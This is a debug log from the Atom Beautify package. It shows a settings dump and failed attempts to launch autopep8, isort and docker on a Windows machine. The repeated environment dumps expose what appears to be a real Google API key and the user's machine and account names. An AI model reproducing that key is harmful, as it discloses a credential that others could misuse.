disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , disabled=false, default_beautifier=Pug Beautify, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, e4x=true, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_char= , indent_with_tabs=false, indent_preamble=false, always_look_for_split_braces=true, always_look_for_split_brackets=false, remove_trailing_whitespace=false, align_columns_in_environments=[tabular, matrix, bmatrix, pmatrix], disabled=false, default_beautifier=Latex Beautify, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, end_of_line=System Default, disabled=false, default_beautifier=Lua beautifier, beautify_on_save=false, gfm=true, yaml=true, commonmark=false, disabled=false, default_beautifier=Tidy Markdown, beautify_on_save=false, indent_size=2, indent_char= , syntax=html, indent_inner_html=false, brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Marko Beautifier, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=JS Beautify, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, dontJoinCurlyBracet=true, disabled=false, default_beautifier=Nginx Beautify, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, disabled=false, default_beautifier=ocp-indent, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, perltidy_profile=, disabled=false, default_beautifier=Perltidy, beautify_on_save=false, cs_fixer_path=, cs_fixer_version=2, cs_fixer_config_file=, fixers=, level=, rules=, allow_risky=no, phpcbf_path=, phpcbf_version=2, standard=PEAR, disabled=false, default_beautifier=PHP-CS-Fixer, beautify_on_save=false, disabled=false, default_beautifier=puppet-lint, beautify_on_save=false, max_line_length=79, indent_size=4, ignore=[E24], formater=autopep8, style_config=pep8, sort_imports=false, multi_line_output=Hanging Grid Grouped, disabled=false, default_beautifier=autopep8, beautify_on_save=false, indent_size=2, disabled=false, default_beautifier=formatR, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , rubocop_path=, disabled=false, default_beautifier=Rubocop, beautify_on_save=false, rustfmt_path=, disabled=false, default_beautifier=rustfmt, beautify_on_save=false, disabled=false, default_beautifier=SassConvert, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, configPath=, predefinedConfig=csscomb, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, keywords=upper, identifiers=unchanged, disabled=false, default_beautifier=sqlformat, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , newline_between_rules=true, preserve_newlines=false, wrap_line_length=0, indent_comments=true, force_indentation=false, convert_quotes=none, align_assignments=false, no_lead_zero=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_with_tabs=false, preserve_newlines=true, space_in_paren=false, space_after_anon_function=false, break_chained_methods=false, wrap_line_length=250, end_with_comma=false, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=0, end_with_newline=false, end_with_comma=false, end_of_line=System Default, disabled=false, default_beautifier=TypeScript Formatter, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, configPath=, disabled=false, default_beautifier=Uncrustify, beautify_on_save=false, indent_size=2, indent_char= , indent_level=0, indent_with_tabs=false, preserve_newlines=true, max_preserve_newlines=10, space_in_paren=false, jslint_happy=false, space_after_anon_function=false, brace_style=collapse, break_chained_methods=false, keep_array_indentation=false, keep_function_indentation=false, space_before_conditional=true, eval_code=false, unescape_strings=false, wrap_line_length=250, end_with_newline=false, end_with_comma=false, end_of_line=System Default, indent_inner_html=false, indent_scripts=normal, wrap_attributes=auto, wrap_attributes_indent_size=2, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], extra_liners=[head, body, /html], disabled=false, default_beautifier=Vue Beautifier, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_inner_html=false, indent_size=2, indent_char= , brace_style=collapse, indent_scripts=normal, wrap_line_length=250, wrap_attributes=auto, wrap_attributes_indent_size=2, preserve_newlines=true, max_preserve_newlines=10, unformatted=[a, abbr, area, audio, b, bdi, bdo, br, button, canvas, cite, code, data, datalist, del, dfn, em, embed, i, iframe, img, input, ins, kbd, keygen, label, map, mark, math, meter, noscript, object, output, progress, q, ruby, s, samp, select, small, span, strong, sub, sup, svg, template, textarea, time, u, var, video, wbr, text, acronym, address, big, dt, ins, small, strike, tt, pre, h1, h2, h3, h4, h5, h6], end_with_newline=false, extra_liners=[head, body, /html], disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, indent_size=2, indent_char= , wrap_line_length=250, preserve_newlines=true, disabled=false, default_beautifier=Pretty Diff, beautify_on_save=false, padding=0, disabled=false, default_beautifier=align-yaml, beautify_on_save=false, , , , , , ,
2017-07-23T12:31:34.256Z - verbose: [beautifiers\index.coffee] beautifiers 0=autopep8, 1=pybeautifier, 2=yapf
2017-07-23T12:31:34.257Z - verbose: [beautifiers\index.coffee] beautifier autopep8
2017-07-23T12:31:34.992Z - debug: [beautifiers\beautifier.coffee] Load executables
2017-07-23T12:31:34.995Z - verbose: [] autopep8 executable logger has been initialized.
2017-07-23T12:31:34.996Z - verbose: [] Docker executable logger has been initialized.
2017-07-23T12:31:34.996Z - verbose: [] isort executable logger has been initialized.
2017-07-23T12:31:34.997Z - info: [beautifiers\index.coffee] Analytics is enabled.
2017-07-23T12:31:35.067Z - info: [beautifiers\index.coffee] Analytics is enabled.
2017-07-23T12:31:35.069Z - verbose: [] loadVersion undefined false
2017-07-23T12:31:35.069Z - verbose: [] Loading version without cache
2017-07-23T12:31:35.069Z - debug: [] returnStdoutOrStderr=true
2017-07-23T12:31:35.070Z - debug: [] env _bitField=33554432, _fulfillmentHandler0=undefined, ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows, _promise0=undefined, _receiver0=undefined
2017-07-23T12:31:35.071Z - verbose: [] loadVersion undefined false
2017-07-23T12:31:35.071Z - verbose: [] Loading version without cache
2017-07-23T12:31:35.071Z - debug: []
2017-07-23T12:31:35.071Z - debug: [] env _bitField=33554432, _fulfillmentHandler0=undefined, ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows, _promise0=undefined, _receiver0=undefined
2017-07-23T12:31:35.072Z - debug: [] exeName, args: autopep8 0=--version
2017-07-23T12:31:35.072Z - debug: [] exeName, args: isort 0=--version
2017-07-23T12:31:35.445Z - debug: [] exePath: isort
2017-07-23T12:31:35.445Z - debug: [] env: ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows
2017-07-23T12:31:35.445Z - debug: [] PATH: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin
2017-07-23T12:31:35.446Z - debug: [] args 0=--version
2017-07-23T12:31:35.446Z - debug: [] relativized args 0=--version
2017-07-23T12:31:35.446Z - debug: [] spawnOptions cwd=C:\Users\xyz_MG\AppData\Local\Temp, ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows
2017-07-23T12:31:35.447Z - debug: [] spawn isort 0=--version
2017-07-23T12:31:35.452Z - debug: [] error Error: spawn isort ENOENT
at exports._errnoException (util.js:1026:11)
at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
at onErrorNT (internal/child_process.js:359:16)
at _combinedTickCallback (internal/process/next_tick.js:74:11)
at process._tickCallback (internal/process/next_tick.js:98:9)
2017-07-23T12:31:35.454Z - debug: [] error Error: spawn isort ENOENT
at exports._errnoException (util.js:1026:11)
at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
at onErrorNT (internal/child_process.js:359:16)
at _combinedTickCallback (internal/process/next_tick.js:74:11)
at process._tickCallback (internal/process/next_tick.js:98:9)
2017-07-23T12:31:35.458Z - debug: [] exePath: autopep8
2017-07-23T12:31:35.458Z - debug: [] env: ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows
2017-07-23T12:31:35.458Z - debug: [] PATH: C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin
2017-07-23T12:31:35.458Z - debug: [] args 0=--version
2017-07-23T12:31:35.458Z - debug: [] relativized args 0=--version
2017-07-23T12:31:35.459Z - debug: [] spawnOptions cwd=C:\Users\xyz_MG\AppData\Local\Temp, ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows
2017-07-23T12:31:35.459Z - debug: [] spawn autopep8 0=--version
2017-07-23T12:31:35.462Z - debug: [] error Error: spawn autopep8 ENOENT
at exports._errnoException (util.js:1026:11)
at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
at onErrorNT (internal/child_process.js:359:16)
at _combinedTickCallback (internal/process/next_tick.js:74:11)
at process._tickCallback (internal/process/next_tick.js:98:9)
2017-07-23T12:31:35.463Z - debug: [] error Error: spawn autopep8 ENOENT
at exports._errnoException (util.js:1026:11)
at Process.ChildProcess._handle.onexit (internal/child_process.js:193:32)
at onErrorNT (internal/child_process.js:359:16)
at _combinedTickCallback (internal/process/next_tick.js:74:11)
at process._tickCallback (internal/process/next_tick.js:98:9)
2017-07-23T12:31:35.464Z - verbose: [] loadVersion undefined false
2017-07-23T12:31:35.464Z - verbose: [] Loading version without cache
2017-07-23T12:31:35.464Z - debug: []
2017-07-23T12:31:35.464Z - debug: [] env _bitField=33554432, _fulfillmentHandler0=undefined, ALLUSERSPROFILE=C:\ProgramData, APPDATA=C:\Users\xyz_MG\AppData\Roaming, ATOM_HOME=C:\Users\xyz_MG\.atom, CommonProgramFiles=C:\Program Files\Common Files, CommonProgramFiles(x86)=C:\Program Files (x86)\Common Files, CommonProgramW6432=C:\Program Files\Common Files, COMPUTERNAME=DESKTOP-U4L73CS, ComSpec=C:\Windows\system32\cmd.exe, FPS_BROWSER_APP_PROFILE_STRING=Internet Explorer, FPS_BROWSER_USER_PROFILE_STRING=Default, GOOGLE_API_KEY=AIzaSyAQfxPJiounkhOjODEO5ZieffeBv6yft2Q, HOMEDRIVE=C:, HOMEPATH=\Users\xyz_MG, LOCALAPPDATA=C:\Users\xyz_MG\AppData\Local, LOGONSERVER=\\DESKTOP-U4L73CS, NODE_ENV=production, NODE_PATH=C:\Users\xyz_MG\AppData\Local\atom\app-1.14.3\resources\app.asar\exports, NUMBER_OF_PROCESSORS=4, OneDrive=C:\Users\xyz_MG\OneDrive, OS=Windows_NT, Path=C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\xyz_MG\AppData\Local\Microsoft\WindowsApps;;E:\VSCode\Microsoft VS Code\bin, PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC, PROCESSOR_ARCHITECTURE=AMD64, PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 61 Stepping 4, GenuineIntel, PROCESSOR_LEVEL=6, PROCESSOR_REVISION=3d04, ProgramData=C:\ProgramData, ProgramFiles=C:\Program Files, ProgramFiles(x86)=C:\Program Files (x86), ProgramW6432=C:\Program Files, PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules, PUBLIC=C:\Users\Public, SESSIONNAME=Console, SynaProgDir=Synaptics\SynTP, SystemDrive=C:, SystemRoot=C:\Windows, TEMP=C:\Users\xyz_MG\AppData\Local\Temp, TMP=C:\Users\xyz_MG\AppData\Local\Temp, USERDOMAIN=DESKTOP-U4L73CS, USERDOMAIN_ROAMINGPROFILE=DESKTOP-U4L73CS, USERNAME=xyz_MG, USERPROFILE=C:\Users\xyz_MG, windir=C:\Windows, _promise0=undefined, _receiver0=undefined
2017-07-23T12:31:35.465Z - debug: [] exeName, args: docker 0=--version
2017-07-23T12:31:35.465Z - debug: [] spawn done -4058
